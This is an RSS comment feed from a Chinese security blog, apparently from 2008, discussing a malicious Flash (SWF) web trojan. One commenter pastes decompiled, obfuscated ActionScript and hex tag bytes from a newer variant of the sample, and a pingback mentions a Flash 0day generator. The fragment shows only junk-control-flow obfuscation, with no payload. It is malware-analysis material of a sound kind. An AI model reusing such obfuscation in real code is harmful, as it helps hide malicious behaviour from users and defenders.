<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>《FLASH网马悄然现身互联网》的评论</title>
	<atom:link href="http://huaidan.org/archives/2018.html/feed" rel="self" type="application/rss+xml" />
	<link>http://huaidan.org/archives/2018.html</link>
	<description>关注网络安全</description>
	<lastBuildDate>Sat, 04 Feb 2012 06:18:55 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>作者：回收站</title>
		<link>http://huaidan.org/archives/2018.html/comment-page-1#comment-10012</link>
		<dc:creator>回收站</dc:creator>
		<pubDate>Sun, 01 Jun 2008 02:01:49 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/?p=2018#comment-10012</guid>
		<description>鬼仔，貌似现在这个马又有新东东出来了
前几天我抓到的也就是你现在提的这个，我给个昨天才搞到的。
晕，不知道怎样传图片上来。
这次的SWF里已经没有了“图像”元件
“动作”里代码是这样：
// Action script...

// [Action in Frame 1]
function ()
{
    \x03 = 2687 % 511 * 5;
    return (eval(&quot;\x03&quot;));
} // End of the function
var \x01 = -118 + \x04\x05();
for (\x01 = eval(&quot;\x01&quot;) - 139; eval(&quot;\x01&quot;) == 927; \x01 = eval(&quot;\x01&quot;) + 687)
{
    \x01 = eval(&quot;\x01&quot;) - 786;
    if (false)
    {
        continue;
    } // end if
} // end of for
\x01 = eval(&quot;\x01&quot;) + 67;
if (eval(&quot;\x01&quot;) == 971)
{
    \x01 = eval(&quot;\x01&quot;) - 373;
    
    
} // end if
if (eval(&quot;\x01&quot;) == 137)
{
    \x01 = eval(&quot;\x01&quot;) + 348;
    
} // end if
if (eval(&quot;\x01&quot;) == 403)
{
    \x01 = eval(&quot;\x01&quot;) + 568;
    if (!&quot;\x0f&quot;)
    {
    }
    else
    {
        \x01 = eval(&quot;\x01&quot;) - 373;
    } // end else if
    
} // end if
\x01 = eval(&quot;\x01&quot;) + 442;
if (eval(&quot;\x01&quot;) == 828)
{
    \x01 = eval(&quot;\x01&quot;) - 26;
    
} // end if
if (eval(&quot;\x01&quot;) == 36)
{
    \x01 = eval(&quot;\x01&quot;) + 232;
    if (false)
    {
    }
    else
    {
        \x01 = eval(&quot;\x01&quot;) + 500;
    } // end else if
    
} // end if
if (eval(&quot;\x01&quot;) == 768)
{
    \x01 = eval(&quot;\x01&quot;) - 665;
    
}
else
{
    \x01 = eval(&quot;\x01&quot;) - 552;
    if (eval(&quot;\x01&quot;) == 598)
    {
        \x01 = eval(&quot;\x01&quot;) - 113;
        
    } // end if
    \x01 = eval(&quot;\x01&quot;) - 250;
    if (eval(&quot;\x01&quot;) == 141)
    {
        \x01 = eval(&quot;\x01&quot;) + 687;
        
        
    } // end if
    if (eval(&quot;\x01&quot;) == 268)
    {
        \x01 = eval(&quot;\x01&quot;) + 500;
        
    } // end if
    if (eval(&quot;\x01&quot;) == 673)
    {
        \x01 = eval(&quot;\x01&quot;) + 129;
        
    } // end if
    \x01 = eval(&quot;\x01&quot;) + 326;
    var \x0f = 1;
    if (eval(&quot;\x01&quot;) == 945)
    {
        \x01 = eval(&quot;\x01&quot;) - 357;
        
    } // end if
    if (eval(&quot;\x01&quot;) == 103)
    {
        \x01 = eval(&quot;\x01&quot;) - 103;
        
    } // end if
    
} // end else if


跟以前不一样了
另外还有两个“unknown”和&quot;file attributes&quot;的标签，
&quot;file attributes&quot;的十六进制是：44 11 00 00 00
unknown 0 是：C1 3F 20
7F 3F 4D 01 00 00 E0 93 D3 85 87 0B 74 2F B2 5C A2 2B AD C5 42 04 50 D8 A4 87 8B A6 A6 5E 10 6C 32 78 26 40 D7 02


和以前的有很大的区别了，照你说的那样改也是不行的了。</description>
		<content:encoded><![CDATA[<p>鬼仔，貌似现在这个马又有新东东出来了<br />
前几天我抓到的也就是你现在提的这个，我给个昨天才搞到的。<br />
晕，不知道怎样传图片上来。<br />
这次的SWF里已经没有了“图像”元件<br />
“动作”里代码是这样：<br />
// Action script...</p>
<p>// [Action in Frame 1]<br />
function ()<br />
{<br />
    \x03 = 2687 % 511 * 5;<br />
    return (eval("\x03"));<br />
} // End of the function<br />
var \x01 = -118 + \x04\x05();<br />
for (\x01 = eval("\x01") - 139; eval("\x01") == 927; \x01 = eval("\x01") + 687)<br />
{<br />
    \x01 = eval("\x01") - 786;<br />
    if (false)<br />
    {<br />
        continue;<br />
    } // end if<br />
} // end of for<br />
\x01 = eval("\x01") + 67;<br />
if (eval("\x01") == 971)<br />
{<br />
    \x01 = eval("\x01") - 373;</p>
<p>} // end if<br />
if (eval("\x01") == 137)<br />
{<br />
    \x01 = eval("\x01") + 348;</p>
<p>} // end if<br />
if (eval("\x01") == 403)<br />
{<br />
    \x01 = eval("\x01") + 568;<br />
    if (!"\x0f")<br />
    {<br />
    }<br />
    else<br />
    {<br />
        \x01 = eval("\x01") - 373;<br />
    } // end else if</p>
<p>} // end if<br />
\x01 = eval("\x01") + 442;<br />
if (eval("\x01") == 828)<br />
{<br />
    \x01 = eval("\x01") - 26;</p>
<p>} // end if<br />
if (eval("\x01") == 36)<br />
{<br />
    \x01 = eval("\x01") + 232;<br />
    if (false)<br />
    {<br />
    }<br />
    else<br />
    {<br />
        \x01 = eval("\x01") + 500;<br />
    } // end else if</p>
<p>} // end if<br />
if (eval("\x01") == 768)<br />
{<br />
    \x01 = eval("\x01") - 665;</p>
<p>}<br />
else<br />
{<br />
    \x01 = eval("\x01") - 552;<br />
    if (eval("\x01") == 598)<br />
    {<br />
        \x01 = eval("\x01") - 113;</p>
<p>    } // end if<br />
    \x01 = eval("\x01") - 250;<br />
    if (eval("\x01") == 141)<br />
    {<br />
        \x01 = eval("\x01") + 687;</p>
<p>    } // end if<br />
    if (eval("\x01") == 268)<br />
    {<br />
        \x01 = eval("\x01") + 500;</p>
<p>    } // end if<br />
    if (eval("\x01") == 673)<br />
    {<br />
        \x01 = eval("\x01") + 129;</p>
<p>    } // end if<br />
    \x01 = eval("\x01") + 326;<br />
    var \x0f = 1;<br />
    if (eval("\x01") == 945)<br />
    {<br />
        \x01 = eval("\x01") - 357;</p>
<p>    } // end if<br />
    if (eval("\x01") == 103)<br />
    {<br />
        \x01 = eval("\x01") - 103;</p>
<p>    } // end if</p>
<p>} // end else if</p>
<p>跟以前不一样了<br />
另外还有两个“unknown”和"file attributes"的标签，<br />
"file attributes"的十六进制是：44 11 00 00 00<br />
unknown 0 是：C1 3F 20<br />
7F 3F 4D 01 00 00 E0 93 D3 85 87 0B 74 2F B2 5C A2 2B AD C5 42 04 50 D8 A4 87 8B A6 A6 5E 10 6C 32 78 26 40 D7 02</p>
<p>和以前的有很大的区别了，照你说的那样改也是不行的了。</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：Flash 0day生成器 &#124; 鬼仔&#8217;s Blog</title>
		<link>http://huaidan.org/archives/2018.html/comment-page-1#comment-9950</link>
		<dc:creator>Flash 0day生成器 &#124; 鬼仔&#8217;s Blog</dc:creator>
		<pubDate>Thu, 29 May 2008 12:51:16 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/?p=2018#comment-9950</guid>
		<description>[...] 鬼仔：也就是这个了，open写的。 [...]</description>
		<content:encoded><![CDATA[<p>[...] 鬼仔：也就是这个了，open写的。 [...]</p>
]]></content:encoded>
	</item>
</channel>
</rss>

